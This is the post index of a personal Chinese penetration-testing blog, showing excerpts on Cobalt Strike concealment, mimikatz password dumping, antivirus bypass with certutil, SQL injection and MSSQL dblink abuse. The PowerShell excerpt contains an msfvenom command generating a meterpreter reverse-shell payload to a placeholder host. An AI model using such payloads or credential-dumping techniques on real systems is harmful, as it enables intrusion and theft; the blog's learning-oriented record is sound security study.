首页
网络安全
初级安全
中级安全
垃圾代码
不安全类
安全类
非网安
乱七八糟
踩坑记录
学习记录
关于我
Hidu
累计撰写
42
篇文章
累计创建
11
个分类
累计收到
0
条评论
导航
首页
网络安全
初级安全
中级安全
垃圾代码
不安全类
安全类
非网安
乱七八糟
踩坑记录
学习记录
关于我
目录
Cobalt Strike使用记录
2024-05-11 21:31
142
0
0
38.2℃
初级安全
介绍 平常使用Cobale Strike的一些记录,一些坑等。目前只是大致记录了下,还未记录实质内容。 还有就是cs文件的问题,在网上下载的cs自己也不会判断是否存在暗桩,也不会弄,而且下载的压缩包内文件也太多,所以我就把没用的文件都删了,留下必要的文件。客户端和服务端运行只需要下述的相关文件即可,
Log4j攻击排查记录
2024-05-11 21:30
68
0
0
30.8℃
乱七八糟
介绍 前几天安全全可谓是过大年,虽然我也是安全圈一份子,但是这个年我可没有过,和我无关。 距离过年当天也以及过去了七八天了吧,今天闲得无聊登录了我的vps并看了看我的nginx日志,然后在看的时候不经意间瞟见了 "jndi:ldap" 等敏感字眼,然后一个大激灵,原来我的博客也是通过java跑起来的
Cobalt Strike隐藏篇
2024-05-11 21:28
14
0
0
25.4℃
初级安全
开头 在网上查阅资料,目前Cobalt Strike的隐藏主要通过CDN和Nginx反代来实现,但是查阅了很多资料没有看见有将两者结合起来实现的情况,所以就想尝试一下,最开始确实失败了,但是后面瞎折腾,也还是实现了cloudflare cdn和Nginx反向代理两种方法相结合的方式使目标上线,所以这
申请免费SSL证书
2024-05-11 21:27
11
0
0
25.1℃
踩坑记录
介绍 烦死了,腾讯云天天一条短信提醒我证书快过期了,我知道快过期了,让我买我也买不起啊。 由于我的vps是nginx,所以该方式适用于nginx上的HTTPS证书部署。 2024-5-11更新,将域名接入到cloudflare了,然后cloudflare上可以直接创建SSL证书,所以现在相对来说要方
这是一次SQL注入后感
2024-05-11 21:26
80
0
0
32.0℃
中级安全
介绍 偶尔会遇到一些注入,已经能确认存在注入,但是使用sqlmap却无法跑出来的情况,然后今日被某站扩展了思路。 某个登录位置存在注入,由于不知道账号,使用万能密码无法登录(后面测试了账号正确情况下万能密码能够登录),但是使用and以及or语句已经确定存在了注入,当时知道sqlmap跑不出来的情况下
Windows获取明文密码的常见方式
2024-05-11 21:25
987
0
0
122.7℃
初级安全
Windows获取明文密码 目前网络上已经有许多获取Windows系统明文密码的方式了,且都比较成熟,所以我这里写的和那些相比就属于小巫见大巫了。 这里主要将抓取明文密码,抓Hash方法也适用,包含但不限于下述这些方法。 直接使用mimikatz 第一种比较常见的就是直接使用mimikatz抓取目标
关于执行命令时被拦截的那档子事
2024-05-11 21:24
258
0
0
49.8℃
初级安全
关于执行命令时被拦截的那档子事 因为电脑就安装了火绒,所以就用火绒实验了,360之类的应该同理。 绕过拦截 虽然这个思路我早就有,但是一直没实验;今天恰巧下载文件太慢我试试用certutil命令下载,然后执行命令的时候被火绒弹窗拦截了。
mssql数据库之dblink
2024-05-11 21:22
8
0
0
24.8℃
中级安全
MSSQL数据库之DBLINK DBLINK,翻译为中文是**数据库链接**,如同字面意思一样,就是数据库本身链接了其他的数据库,又名链接服务器,而这一配置,在MSSQL数据库中比较常见,且如果目标配置了DBLINK,则更加的有利于我们的工作。 实际工作中,可能遇到以下的利用情况: 通过SQL注入,
关于命令执行无回显那档子事-2
2024-05-11 21:20
31
0
0
27.1℃
中级安全
通过HttpLog方式查看命令回显 基于前面写的一篇文章:【关于命令执行无回显的那档子事】 ------ 2023.4.28 update ------ 4月1号遇到的问题现在解决了,因为考虑到可能部分主机不存在curl环境,所以最终还是基于powershell来实现,实际使用中如果出现错误,则可能
PowerShell一些笔记
2024-05-11 21:20
17
0
0
25.7℃
初级安全
Powershell使用 msf生成后门: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=8080 --arch x64 --platform windows -f psh-reflection -o test
上一页
下一页
1
2
3
弹